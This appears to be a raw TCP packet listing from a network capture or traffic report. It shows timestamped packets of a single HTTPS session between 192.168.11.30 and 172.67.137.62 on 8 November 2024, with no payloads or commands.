                                                                                                                          Nov 8, 2024 10:59:45.795253992 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.795574903 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.795581102 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.796422958 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.796433926 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.796648026 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.796654940 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.796755075 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.797394991 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.797401905 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.797571898 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.797578096 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.797800064 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.798312902 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.798320055 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.798520088 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.798526049 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.798613071 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.799345016 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.799356937 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.799487114 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.799495935 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.799595118 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.799690962 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.800645113 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.800652981 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.800810099 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.800901890 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.800906897 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.800930023 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.848126888 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.995156050 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.995171070 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.995487928 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.995498896 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.995878935 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.995963097 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.995974064 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.996325970 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.996335983 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.996390104 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.996712923 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.996908903 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.996917963 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.997220993 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.997231960 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.997457027 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.997575998 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.997585058 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.997920990 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.998063087 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.998073101 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.998534918 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.998789072 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.998797894 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.999079943 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.999159098 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.999169111 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.999403954 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.999875069 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.999882936 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.000119925 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.000129938 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.000210047 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.000379086 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.000754118 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.000763893 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.000921011 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.000999928 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.001004934 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.001171112 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.001249075 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.001728058 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.001735926 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.002001047 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.002156973 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.002161980 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.002365112 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.002836943 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.002846003 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.003142118 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.003148079 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.003340006 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.003978968 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.003987074 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.004156113 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.004445076 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.004450083 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.004614115 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.004851103 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.004862070 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.005091906 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.005099058 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.005302906 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.005994081 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.006002903 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.006160975 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.006357908 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.006361961 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.006576061 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.007153034 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.007165909 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.007457972 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.007556915 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.007561922 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.007772923 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.008061886 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.008073092 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.008286953 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.008295059 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.008407116 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.008681059 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.009382010 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.009391069 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.009565115 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.009993076 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.009998083 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.010070086 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.010082006 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.010216951 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.010222912 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.010529041 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.011471987 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.011482954 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.011645079 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.011774063 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.011779070 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.011976004 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.012605906 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.012617111 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.012895107 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.013010979 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.013015985 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.013128042 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.013184071 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.013195038 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.013322115 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.013328075 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.013789892 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.014319897 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.014329910 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.014533997 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.014676094 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.014679909 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.015002966 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.015300989 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.015314102 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.015465975 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.015559912 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.015564919 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.015872002 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.016382933 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.016393900 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.016590118 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.016680002 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.016685963 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.016971111 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.017417908 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.017427921 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.017627954 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.017632961 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.017719030 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.017848015 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.018399954 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.018408060 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.018579006 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.018651962 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.018656015 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.018798113 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.019042969 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.019526005 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.019536018 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.019798040 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.020057917 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.020064116 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.020453930 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.020467043 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.020473957 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.020478964 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.020684004 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.020772934 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.021541119 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.021549940 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.021708965 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.021784067 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.021787882 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.021903992 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.022084951 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.022532940 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.022542953 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.022840977 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.022846937 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.023047924 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.023519039 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.023536921 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.023878098 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.023885012 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.023943901 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.024334908 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.024689913 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.024699926 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.025170088 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.025176048 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.025532961 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.025723934 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.025732994 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.025975943 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.025981903 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.026051044 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.026206970 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.026720047 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.026729107 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.026922941 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.027077913 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.027082920 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.027129889 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.027273893 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.027719975 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.027729988 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.027924061 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.027924061 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.027930975 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.028023005 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.028093100 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.028820992 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.028831959 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.029084921 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.029090881 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.029184103 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.029301882 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.029846907 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.029858112 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.030040979 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.030103922 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.030108929 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.030494928 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.030939102 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.030950069 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.031342983 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.031348944 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.031763077 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.032100916 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.032110929 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.032275915 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.032352924 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.032357931 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.032465935 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.032603025 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.032969952 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.032979965 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.033175945 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.033181906 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.033240080 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.033346891 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.033915997 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.033926964 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.034215927 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.034368992 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.034373999 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.034707069 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.034960032 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.034970045 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.035165071 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.035170078 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.035574913 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.036123037 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.036133051 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.036345005 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.036350965 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.036439896 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.036557913 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.036963940 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.036974907 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.037141085 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.037192106 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.037197113 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.037286043 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.037493944 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.038147926 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.038158894 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.038492918 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.038499117 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.038541079 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.038700104 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.039127111 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.039138079 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.039338112 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.039347887 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.039469957 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.039649963 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.040241003 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.040249109 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.040466070 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.040472031 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.040570021 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.040702105 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.041229963 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.041239977 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.041404009 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.041481972 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.041486979 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.041574001 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.041744947 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.042444944 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.042457104 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.042783022 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.042788982 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.042990923 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.043155909 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.043165922 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.043368101 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.043549061 CET49754443192.168.11.30172.67.137.62
